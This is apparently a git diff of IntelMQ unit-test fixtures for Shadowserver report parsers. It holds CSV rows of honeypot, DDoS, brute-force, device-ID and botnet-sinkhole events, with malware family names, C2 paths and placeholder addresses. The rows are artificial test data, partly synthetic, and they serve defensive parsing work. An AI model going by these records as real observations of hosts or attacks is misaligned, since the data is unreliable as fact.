-"2018-11-19 00:11:24","198.51.100.37",,64496,"AT","WIEN","VIENNA","198-51-100-37.example.net",,,5555,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:14:24","198.51.100.199",,64496,"AT","WIEN","VIENNA","198-51-100-199.example.net",,,8080,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:14:54","198.51.100.50",,64496,"AT","OBEROSTERREICH","UNTERACH","198-51-100-50.example.net",,,81,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:16:08","198.51.100.114",,64496,"AT","WIEN","VIENNA","198-51-100-120.example.net",,,2323,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:16:34","198.51.100.87",,64496,"AT","WIEN","VIENNA","198-51-100-87.example.net",,,8001,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:17:08","198.51.100.107",,64496,"AT","WIEN","VIENNA",,,,8001,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:19:18","198.51.100.92",,64496,"AT","OBEROSTERREICH","LINZ","198-51-100-92.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 00:19:32","198.51.100.220",,64496,"AT","WIEN","VIENNA","198-51-100-220.example.net",,,8001,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:25:37","198.51.100.238",,64496,"AT","WIEN","VIENNA","198-51-100-238.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:25:43","198.51.100.116",,64496,"AT","WIEN","VIENNA","198-51-100-116.example.net",,,8088,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:32:17","198.51.100.103",,64496,"AT","WIEN","VIENNA","198-51-100-103.example.net",,,82,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:33:04","198.51.100.149",,64496,"AT","TIROL","INNSBRUCK","198-51-100-149.example.net",,,5555,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:39:09","198.51.100.54",,64496,"AT","WIEN","VIENNA","198-51-100-54.example.net",,,85,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:39:51","198.51.100.83",,64496,"AT","KARNTEN","KLAGENFURT AM WORTHERSEE","198-51-100-83.example.net",,,85,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 00:53:46","198.51.100.148",,64496,"AT","NIEDEROSTERREICH","SCHWECHAT","198-51-100-148.example.net",,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:00:44","198.51.100.170",,64496,"AT","VORARLBERG","BREGENZ",,,,9000,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:01:41","198.51.100.165",,64496,"AT","WIEN","VIENNA","198-51-100-163.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:20:04","198.51.100.122",,64496,"AT","NIEDEROSTERREICH","BRUNN AM GEBIRGE",,,,32764,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 01:29:10","198.51.100.224",,64496,"AT","WIEN","VIENNA","198-51-100-224.example.net",,,8080,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 02:14:38","198.51.100.155",,64496,"AT","KARNTEN","KLAGENFURT AM WORTHERSEE","198-51-100-155.example.net",,,23,,,2,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 02:28:09","198.51.100.194",,64496,"AT","SALZBURG","SALZBURG","198-51-100-194.example.net",,,8080,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 02:35:46","198.51.100.30",,64496,"AT","OBEROSTERREICH","ATTERSEE",,,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 02:52:06","198.51.100.83",,64496,"AT","WIEN","VIENNA","198-51-100-83.example.net",,,8080,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 02:56:35","198.51.100.170",,64496,"AT","WIEN","VIENNA","198-51-100-170.example.net",,,2323,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:09:48","198.51.100.142",,64496,"AT","TIROL","LIENZ",,,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 03:28:10","198.51.100.239",,64496,"AT","WIEN","VIENNA","198-51-100-201.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:36:49","198.51.100.238",,64496,"AT","TIROL","INNSBRUCK",,,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:40:26","198.51.100.137",,64496,"AT","STEIERMARK","GRAZ","198-51-100-137.example.net",,,5555,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 03:52:58","198.51.100.246",,64496,"AT","WIEN","VIENNA","198-51-100-246.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 04:02:35","198.51.100.196",,64496,"AT","WIEN","VIENNA","198-51-100-196.example.net",,,80,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 04:07:21","198.51.100.53",,64496,"AT","STEIERMARK","WEIZ","198-51-100-53.example.net",,,8443,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 04:16:16","198.51.100.30",,64496,"AT","TIROL","LADIS",,,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 04:46:25","198.51.100.123",,64496,"AT","OBEROSTERREICH","VOCKLABRUCK","198-51-100-123.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 05:06:03","198.51.100.212",,64496,"AT","STEIERMARK","GLEISDORF",,,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 06:51:18","198.51.100.190",,64496,"AT","STEIERMARK","WEIZ",,,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 07:24:54","198.51.100.192",,64496,"AT","SALZBURG","BAD GASTEIN","198-51-100-192.example.net",,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 08:49:45","198.51.100.28",,64496,"AT","OBEROSTERREICH","RUTZENMOOS",,,,8001,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 09:36:18","198.51.100.87",,64496,"AT","TIROL","ZAMS",,,,8443,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:03:42","198.51.100.174",,64496,"AT","KARNTEN","KLAGENFURT AM WORTHERSEE","198-51-100-174.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 10:05:04","198.51.100.186",,64496,"AT","OBEROSTERREICH","WELS","198-51-100-186.example.net",,,85,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:17:33","198.51.100.223",,64496,"AT","SALZBURG","SAALFELDEN AM STEINERNEN MEER","198-51-100-223.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:18:20","198.51.100.223",,64496,"AT","SALZBURG","SAALFELDEN AM STEINERNEN MEER","198-51-100-223.example.net",,,23,,,2,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:50:37","198.51.100.164",,64496,"AT","OBEROSTERREICH","UNTERACH","198-51-100-164.example.net",,,81,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 10:54:51","198.51.100.204",,64496,"AT","VORARLBERG","HOHENEMS",,,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 11:26:57","198.51.100.120",,64496,"AT","WIEN","VIENNA","198-51-100-120.example.net",,,23,,,3,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 12:46:00","198.51.100.157",,64496,"AT","BURGENLAND","EISENSTADT","198-51-100-157.example.net",,,84,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 14:17:26","198.51.100.107",,64496,"AT","WIEN","VIENNA","198-51-100-107.example.net",,,80,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 15:09:26","198.51.100.135",,64496,"AT","OBEROSTERREICH","THALHEIM BEI WELS","198-51-100-135.example.net",,,8000,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 15:54:29","198.51.100.185",,64496,"AT","NIEDEROSTERREICH","NEULENGBACH","198-51-100-185.example.net",,,8080,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 16:45:10","198.51.100.222",,64496,"AT","STEIERMARK","GRAZ","198-51-100-222.example.net",,,2480,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 17:19:06","198.51.100.195",,64496,"AT","WIEN","VIENNA","198-51-100-195.example.net",,,23,,,1,518210,737415,,,,,,"mirai-like","sissden"
-"2018-11-19 17:45:05","198.51.100.56",,64496,"AT","NIEDEROSTERREICH","PERCHTOLDSDORF","198-51-100-56.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:42:08","198.51.100.140",,64496,"AT","OBEROSTERREICH","RUTZENMOOS",,,,8081,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:47:03","198.51.100.63",,64496,"AT","TIROL","DOLSACH","198-51-100-218.example.net",,,23,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:48:28","198.51.100.54",,64496,"AT","TIROL","ST. VEIT IN DEFEREGGEN","198-51-100-67.example.net",,,85,,,1,0,0,,,,,,"mirai-like","sissden"
-"2018-11-19 22:58:23","198.51.100.146",,64496,"AT","WIEN","VIENNA",,,,5555,,,2,518210,737401,,,"Information Technology",,,"mirai-like","sissden"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/ddos_amplification.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/ddos_amplification.csv
deleted file mode 100644
index c91fb627d..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/ddos_amplification.csv
+++ /dev/null
@@ -1,3 +0,0 @@
-"timestamp","ip","protocol","dst_port","tag","src_port","hostname","asn","geo","region","city","naics","sic","request","count","bytes","sensor_geo","sector","end_time","public_source"
-"2018-10-09 06:00:06","192.0.2.10","udp","13","daytime","53","192-0-2-10.example.net","44395","AM","YEREVAN","YEREVAN","0","0","DAYTIME Request","15","2220","RU","IT1","2018-10-09 06:10:01","SSS"
-"2018-10-09 08:14:37","192.0.2.50","udp","123","ntp","53","dhcp-50-2-0-192.net1.bg","43561","BG","SOFIA-GRAD","SOFIA","0","0","Standard query response 0xe98a  NS auth111.ns.uu.net NS auth120.ns.uu.net","15","2700","RU","IT2","2018-10-09 10:14:59","SSS"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv
new file mode 100644
index 000000000..22cfdd69e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv
@@ -0,0 +1,4 @@
+"timestamp","ip","protocol","port","hostname","tag","asn","geo","region","city","naics","sic","sector","device_vendor","device_type","device_model"
+"2022-01-10 00:01:42","88.84.0.0","tcp",10443,,"ssl,vpn",2116,"NO","TROMS OG FINNMARK","TROMVIK",517311,,,"Fortinet","firewall","FortiGate"
+"2022-01-10 00:01:42","170.231.0.0","tcp",10443,,"ssl,vpn",27843,"PE","METROPOLITANA DE LIMA","LIMA",,,,"Fortinet","firewall","FortiGate"
+"2022-01-10 00:01:42","96.60.0.0","tcp",10443,"96-60-66-218.example.com","ssl,vpn",4181,"US","WISCONSIN","MILWAUKEE",517311,,,"Fortinet","firewall","FortiGate"
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/device_id.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/drone_brute_force.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/drone_brute_force.csv
deleted file mode 100644
index 3f6ffa770..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/drone_brute_force.csv
+++ /dev/null
@@ -1,2 +0,0 @@
-"timestamp","ip","port","asn","geo","region","city","hostname","dest_ip","dest_port","dest_asn","dest_geo","dest_dns","service","naics","sic","dest_naics","dest_sic","sector","dest_sector","public_source","start_time","end_time","client_version","username","password","payload_url","payload_md5"
-"2018-04-07 03:02:15","198.51.100.169",38880,64496,"AT","WIEN","WIEN",,"198.51.100.196",22,65536,"CA",,"ssh",0,0,518210,737401,,"Information Technology","SISSDEN","2018-04-07T03:02:15.951205Z","2018-04-07T03:02:19.143501Z","SSH-2.0-libssh2_1.7.0","alex","password",,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv
new file mode 100644
index 000000000..e6fca69a9
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv
@@ -0,0 +1,4 @@
+"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","domain_source","public_source","infection","family","tag","application","version","event_id","dst_network","dst_netmask","attack","duration","attack_src_ip","attack_src_port","domain","domain_transaction_id","gcip","http_method","http_path","http_postdata","http_usessl","ip_header_ack","ip_header_acknum","ip_header_dont_fragment","ip_header_fin","ip_header_identity","ip_header_psh","ip_header_rst","ip_header_seqnum","ip_header_syn","ip_header_tos","ip_header_ttl","ip_header_urg","number_of_connections","packet_length","packet_randomized"
+"2010-02-10 00:00:00",,192.168.0.1,61234,64512,ZZ,Region,City,node01.example.com,0,"Communications, Service Provider, and Hosting Service",,,,172.16.0.1,88,65534,ZZ,Region,City,node01.example.net,0,,,,ddos,mirai,mirai,mirai,,,121.12.110.28/32,32,atk10,30,,,,,,,,,,,,,,,,,,,,,,,1440,
+"2010-02-10 00:00:01",,192.168.0.2,61234,64512,ZZ,Region,City,node02.example.com,0,"Communications, Service Provider, and Hosting Service",,,,172.16.0.2,80,65534,ZZ,Region,City,node02.example.net,0,,,,ddos,mirai,mirai,mirai,,,180.97.183.94/32,32,atk10,30,,,,,,,,,,,,,,,,,,,,,,,1440,
+"2010-02-10 00:00:02",,192.168.0.3,6379,64512,ZZ,Region,City,node03.example.com,0,"Communications, Service Provider, and Hosting Service",,,,172.16.0.3,,65534,ZZ,Region,City,node03.example.net,0,"Communications, Service Provider, and Hosting Service",,,ddos,mirai,mirai,mirai,,,104.237.138.135/32,32,atk7,10,,,,,,,,,,,,,,,,,,,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_amp.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_amp.csv
index 31a069ad6..a7d0bc4f1 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_amp.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_amp.csv
@@ -1,6 +1,6 @@
-"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","request","count","bytes","end_time"
-"2021-03-28 00:00:02",,"107.141.1.2",,7018,"US","CALIFORNIA","VISALIA","107-141-x-x.lightspeed.frsnca.sbcglobal.net",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,"2021-03-28 00:20:22"
-"2021-03-28 00:00:02",,"74.59.3.4",,5769,"CA","QUEBEC","CHICOUTIMI","modemcablex-x-59-74.mc.videotron.ca",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,"2021-03-28 00:13:50"
-"2021-03-28 00:00:02",,"65.131.5.6",,209,"US","WYOMING","CASPER","65-131-x-x.chyn.qwest.net",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,
-"2021-03-28 00:00:02",,"104.162.7.8",,12271,"US","NEW YORK","KINGSTON","cpe-104-162-x-x.hvc.res.rr.com",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,
-"2021-03-28 00:00:02",,"37.120.178.9.10",,197540,"DE","NIEDERSACHSEN","GIFHORN","v22020111328131649.ultrasrv.de",,,,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,
+"timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","request","count","bytes","end_time","duration","avg_pps","max_pps"
+"2021-03-28 00:00:02",,"107.141.1.2",,7018,"US","CALIFORNIA","VISALIA","107-141-x-x.lightspeed.frsnca.sbcglobal.net",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,"2021-03-28 00:20:22",,,
+"2021-03-28 00:00:02",,"74.59.3.4",,5769,"CA","QUEBEC","CHICOUTIMI","modemcablex-x-59-74.mc.videotron.ca",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,"2021-03-28 00:13:50",,,
+"2021-03-28 00:00:02",,"65.131.5.6",,209,"US","WYOMING","CASPER","65-131-x-x.chyn.qwest.net",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,,,,
+"2021-03-28 00:00:02",,"104.162.7.8",,12271,"US","NEW YORK","KINGSTON","cpe-104-162-x-x.hvc.res.rr.com",517311,"Communications, Service Provider, and Hosting Service",,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,,,,
+"2021-03-28 00:00:02",,"37.120.178.9.10",,197540,"DE","NIEDERSACHSEN","GIFHORN","v22020111328131649.ultrasrv.de",,,,,,,389,,,,,,,,"CISPA","ddos-amplification",,,,,,,,,,,,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv
new file mode 100644
index 000000000..0e5b1e5e9
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv
@@ -0,0 +1,4 @@
+"timestamp","protocol","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","device_vendor","device_type","device_model","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","domain_source","public_source","infection","family","tag","application","version","event_id","dst_network","dst_netmask","attack","duration","attack_src_ip","attack_src_port","domain","domain_transaction_id","gcip","http_method","http_path","http_postdata","http_usessl","ip_header_ack","ip_header_acknum","ip_header_dont_fragment","ip_header_fin","ip_header_identity","ip_header_psh","ip_header_rst","ip_header_seqnum","ip_header_syn","ip_header_tos","ip_header_ttl","ip_header_urg","number_of_connections","packet_length","packet_randomized"
+"2010-02-10 00:00:00",,172.16.0.1,80,65534,ZZ,Region,City,node01.example.net,0,,,,,192.168.0.1,61234,64512,ZZ,Region,City,node01.example.com,0,"Communications, Service Provider, and Hosting Service",,,ddos,mirai,mirai,mirai,,,115.238.198.85/32,32,atk0,30,,,,,,,,,,,,,,,,,,,,,,,1440,
+"2010-02-10 00:00:01",,172.16.0.2,43437,65534,ZZ,Region,City,node02.example.net,0,Information,,,,192.168.0.2,61234,64512,ZZ,Region,City,node02.example.com,0,"Communications, Service Provider, and Hosting Service",,,ddos,mirai,mirai,mirai,,,52.184.50.250/32,32,atk0,30,,,,,,,,,,,,,,,,,,,,,,,1440,
+"2010-02-10 00:00:02",,172.16.0.3,80,65534,ZZ,Region,City,node03.example.net,0,,,,,192.168.0.3,61234,64512,ZZ,Region,City,node03.example.com,0,"Communications, Service Provider, and Hosting Service",,,ddos,mirai,mirai,mirai,,,211.99.102.216/32,32,atk10,30,,,,,,,,,,,,,,,,,,,,,,,1440,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv.license b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv.license
new file mode 100644
index 000000000..f512a890e
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_honeypot_ddos_target.csv.license
@@ -0,0 +1,2 @@
+SPDX-FileCopyrightText: 2022 The Shadowserver Foundation
+SPDX-License-Identifier: AGPL-3.0-or-later
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole.csv
index f96ca5d9f..eb0cbbab9 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole.csv
@@ -1,7 +1,7 @@
 "timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id"
-"2021-06-07 00:00:00","tcp","190.229.1.2",52955,7303,"AR","BUENOS AIRES","CASEROS",,517311,,,,,"168.63.134.179",16464,8075,"HK","HONG KONG","HONG KONG",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit",,"b68-zeroaccess-2-32bit",,,
-"2021-06-07 00:00:00","tcp","96.20.3.4",16464,5769,"CA","QUEBEC","LAVAL",,517311,"Communications, Service Provider, and Hosting Service",,,,"52.169.3.4",16464,8075,"IE","DUBLIN","DUBLIN",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit",,"b68-zeroaccess-2-32bit",,,
-"2021-06-07 00:00:00","tcp","187.222.5.6",55049,8151,"MX","CIUDAD DE MEXICO","MEXICO CITY",,517311,,,,,"168.63.134.179",16464,8075,"HK","HONG KONG","HONG KONG",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit",,"b68-zeroaccess-2-32bit",,,
-"2021-06-07 00:00:00","tcp","75.84.7.8",64190,20001,"US","CALIFORNIA","NORTH HOLLYWOOD",,517311,"Communications, Service Provider, and Hosting Service",,,,"52.169.7.8",16464,8075,"IE","DUBLIN","DUBLIN",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit",,"b68-zeroaccess-2-32bit",,,
-"2021-06-07 00:00:00","tcp","24.15.9.10",60373,7922,"US","ILLINOIS","HOMER GLEN",,517311,"Communications, Service Provider, and Hosting Service",,,,"104.40.6.5",16464,8075,"US","CALIFORNIA","SAN FRANCISCO",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit",,"b68-zeroaccess-2-32bit",,,
-"2021-06-07 00:00:00","tcp","124.101.11.12",50386,4713,"JP","FUKUOKA","FUKUOKA",,517311,"Communications, Service Provider, and Hosting Service",,,,"23.99.101.165",16465,8075,"HK","HONG KONG","HONG KONG",,334111,"Information","MSDCU","b68-zeroaccess-2-64bit",,"b68-zeroaccess-2-64bit",,
+"2021-06-07 00:00:00","tcp","190.229.1.2",52955,7303,"AR","BUENOS AIRES","CASEROS",,517311,,,,,"168.63.134.179",16464,8075,"HK","HONG KONG","HONG KONG",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit","zeroaccess","b68-zeroaccess-2-32bit",,,
+"2021-06-07 00:00:00","tcp","96.20.3.4",16464,5769,"CA","QUEBEC","LAVAL",,517311,"Communications, Service Provider, and Hosting Service",,,,"52.169.3.4",16464,8075,"IE","DUBLIN","DUBLIN",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit","zeroaccess","b68-zeroaccess-2-32bit",,,
+"2021-06-07 00:00:00","tcp","187.222.5.6",55049,8151,"MX","CIUDAD DE MEXICO","MEXICO CITY",,517311,,,,,"168.63.134.179",16464,8075,"HK","HONG KONG","HONG KONG",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit","zeroaccess","b68-zeroaccess-2-32bit",,,
+"2021-06-07 00:00:00","tcp","75.84.7.8",64190,20001,"US","CALIFORNIA","NORTH HOLLYWOOD",,517311,"Communications, Service Provider, and Hosting Service",,,,"52.169.7.8",16464,8075,"IE","DUBLIN","DUBLIN",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit","zeroaccess","b68-zeroaccess-2-32bit",,,
+"2021-06-07 00:00:00","tcp","24.15.9.10",60373,7922,"US","ILLINOIS","HOMER GLEN",,517311,"Communications, Service Provider, and Hosting Service",,,,"104.40.6.5",16464,8075,"US","CALIFORNIA","SAN FRANCISCO",,334111,"Information","MSDCU","b68-zeroaccess-2-32bit","zeroaccess","b68-zeroaccess-2-32bit",,,
+"2021-06-07 00:00:00","tcp","124.101.11.12",50386,4713,"JP","FUKUOKA","FUKUOKA",,517311,"Communications, Service Provider, and Hosting Service",,,,"23.99.101.165",16465,8075,"HK","HONG KONG","HONG KONG",,334111,"Information","MSDCU","b68-zeroaccess-2-64bit","zeroaccess","b68-zeroaccess-2-64bit",,
diff --git a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole_http.csv b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole_http.csv
index 2c56d2ed3..c56d1f218 100644
--- a/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole_http.csv
+++ b/intelmq/tests/bots/parsers/shadowserver/testdata/event4_microsoft_sinkhole_http.csv
@@ -1,6 +1,6 @@
 "timestamp","protocol","src_ip","src_port","src_asn","src_geo","src_region","src_city","src_hostname","src_naics","src_sector","device_vendor","device_type","device_model","dst_ip","dst_port","dst_asn","dst_geo","dst_region","dst_city","dst_hostname","dst_naics","dst_sector","public_source","infection","family","tag","application","version","event_id","http_url","http_host","http_agent","forwarded_by","ssl_cipher","http_referer"
-"2021-06-07 00:00:00","tcp","31.206.1.2",49245,8386,"TR","ANTALYA","KEPEZ",,,,,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs",,"necurs",,,,"/locator.php","40.121.206.97",,,,
-"2021-06-07 00:00:00","tcp","177.140.3.4",35919,28573,"BR","SAO PAULO","SAO PAULO",,517312,,,,,"204.95.99.204",443,8075,"US","WASHINGTON","REDMOND",,334111,"Information","MSDCU","caphaw",,"caphaw",,,,"/index.php","3fo8jrthz3y.rgk.cc","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.6103)",,,"null"
-"2021-06-07 00:00:01","tcp","180.190.5.6",49264,132199,"PH","CEBU","MANDAUE",,517311,,,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs",,"necurs",,,,"/locator.php","40.121.206.97",,,,
-"2021-06-07 00:00:01","tcp","197.157.7.8",55307,37129,"KE","NAIROBI CITY","NAIROBI",,,,,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs",,"necurs",,,,"/news/stream.php","40.121.206.97",,,,
-"2021-06-07 00:00:01","tcp","174.114.9.10",59000,812,"CA","ONTARIO","OTTAWA",,517311,"Communications, Service Provider, and Hosting Service",,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs",,"necurs",,,,"/locator.php","40.121.206.97",,,,
+"2021-06-07 00:00:00","tcp","31.206.1.2",49245,8386,"TR","ANTALYA","KEPEZ",,,,,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs","necurs","necurs",,,,"/locator.php","40.121.206.97",,,,
+"2021-06-07 00:00:00","tcp","177.140.3.4",35919,28573,"BR","SAO PAULO","SAO PAULO",,517312,,,,,"204.95.99.204",443,8075,"US","WASHINGTON","REDMOND",,334111,"Information","MSDCU","caphaw","caphaw","caphaw",,,,"/index.php","3fo8jrthz3y.rgk.cc","Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.6103)",,,"null"
+"2021-06-07 00:00:01","tcp","180.190.5.6",49264,132199,"PH","CEBU","MANDAUE",,517311,,,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs","necurs","necurs",,,,"/locator.php","40.121.206.97",,,,
+"2021-06-07 00:00:01","tcp","197.157.7.8",55307,37129,"KE","NAIROBI CITY","NAIROBI",,,,,,,"40.121.206.97",80,8075,"US","VIRGINIA","ASHBURN",,334111,"Information","MSDCU","necurs","necurs","necurs",,,,"/news/stream.php","40.121.206.97",,,,
